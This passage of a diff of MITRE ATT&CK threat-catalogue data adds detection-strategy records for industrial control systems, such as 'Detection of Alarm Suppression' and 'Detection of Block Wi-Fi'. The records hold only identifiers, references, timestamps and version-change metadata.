+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0764",
+                            "external_id": "DET0764"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Adversary-in-the-Middle",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--afc9e394-147e-49db-81df-953d2d3ea93e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--105c127f-2777-452e-bf61-b0786ee13861",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0728",
+                            "external_id": "DET0728"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Alarm Suppression",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--edd8297d-ec63-4b54-8d28-106f228dd535"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--442bf059-f7cf-460b-8200-f35e1e0a0c78",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0734",
+                            "external_id": "DET0734"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Automated Collection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e25ef816-bbfd-4656-8ecb-c7eebcba31d4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--930b268b-abf0-485f-9854-60c1cfdd2d33",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0748",
+                            "external_id": "DET0748"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Autorun Image",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2b751a3d-c680-46c9-b92b-55a9d24bd4f9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false, \"root['x_mitre_analytic_refs']\": [\"x-mitre-analytic--2b751a3d-c680-46c9-b92b-55a9d24bd4f9\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2a1619a7-dd27-48e4-b56f-806cb3d2e405",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0784",
+                            "external_id": "DET0784"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Command Message",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--11a350cf-1ea0-4065-877b-c3bb410bf3a0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c779ee07-ee85-42fe-a2c1-14ce25766cdf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 21:48:05.256000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0910",
+                            "external_id": "DET0910"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Communications",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3f052beb-d384-4ebe-b942-2c4ddeb95833"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 21:48:05.256000+00:00\", \"old_value\": \"2026-04-22T21:48:05.256Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:27:42.639Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--feb80c7a-96cd-4300-b344-4d75b176c9cb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 22:42:31.791000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0911",
+                            "external_id": "DET0911"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Ethernet",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--df7f8849-56a7-4e83-9fd7-a4f25227d960"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 22:42:31.791000+00:00\", \"old_value\": \"2026-04-22T22:42:31.791Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:27:51.377Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6f318bab-df4a-4a51-b849-e9c2ab2f9c4c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 15:09:30.933000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0903",
+                            "external_id": "DET0903"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Operational Technology Message",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c556c91d-64a0-401c-9c41-18971eeca0f2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 15:09:30.933000+00:00\", \"old_value\": \"2026-04-22T15:09:30.933Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:28:00.436Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--05f7d4e4-ae99-4339-b71a-59f1e317dc6d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0789",
+                            "external_id": "DET0789"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Reporting Message",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--393d7e7b-0790-49e7-9bcd-87ab4662b05e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4ea060f9-f6fc-4122-9544-70afd567ea10",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0797",
+                            "external_id": "DET0797"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Serial COM",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--354b93da-06e9-4634-a5fd-7f9b7b3a9d5a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--527668a3-cc0c-48c2-856a-a45615817366",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 22:56:48.997000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0912",
+                            "external_id": "DET0912"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Block Wi-Fi",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0b4e7cfa-9f9d-49b0-b5bf-afdf62058c5a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 22:56:48.997000+00:00\", \"old_value\": \"2026-04-22T22:56:48.997Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:28:13.555Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c4ddc0d7-0296-4d92-9ae1-1a4b7b5d1640",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 20:32:50.322000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0908",
+                            "external_id": "DET0908"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Broadcast Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f6324642-d17d-49d4-90b2-bab9d229d6fa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 20:32:50.322000+00:00\", \"old_value\": \"2026-04-22T20:32:50.322Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:29:42.421Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3ea60ac7-87a3-4033-9089-258941d8388a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0737",
+                            "external_id": "DET0737"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Brute Force I/O",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--77857bc3-6a38-4826-8109-30facf6c23ec"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--336b9423-5543-4354-bd00-13c614ccdc96",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0771",
+                            "external_id": "DET0771"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Change Credential",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d3023733-5874-4746-a947-65925514e382"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fddbd892-faa2-40e1-b40d-2c6e33c00f14",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0755",
+                            "external_id": "DET0755"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Change Operating Mode",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--78615cd7-6a14-4921-aaa9-2aae0774f0f1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c0abb110-c80e-4d6a-9f27-f2783f8bbfec",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0760",
+                            "external_id": "DET0760"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Command-Line Interface",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7107739b-92d2-41fa-9fc8-ebe72f6086ee"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--33dd1c37-1702-4de2-9712-fcc640e4b681",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0736",
+                            "external_id": "DET0736"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Commonly Used Port",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--981b659b-992a-4d71-9404-0e1b2b598e50"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--887ae691-a519-4b68-af26-bcea1483cef7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0759",
+                            "external_id": "DET0759"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Connection Proxy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ece52da2-ac60-4b0e-863f-ebbc95118a8c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f9b7143b-ce86-4cfb-a03a-f39c01904fb1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0762",
+                            "external_id": "DET0762"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Damage to Property",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--636e612f-0b63-44e8-bf2c-31b62d20508b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
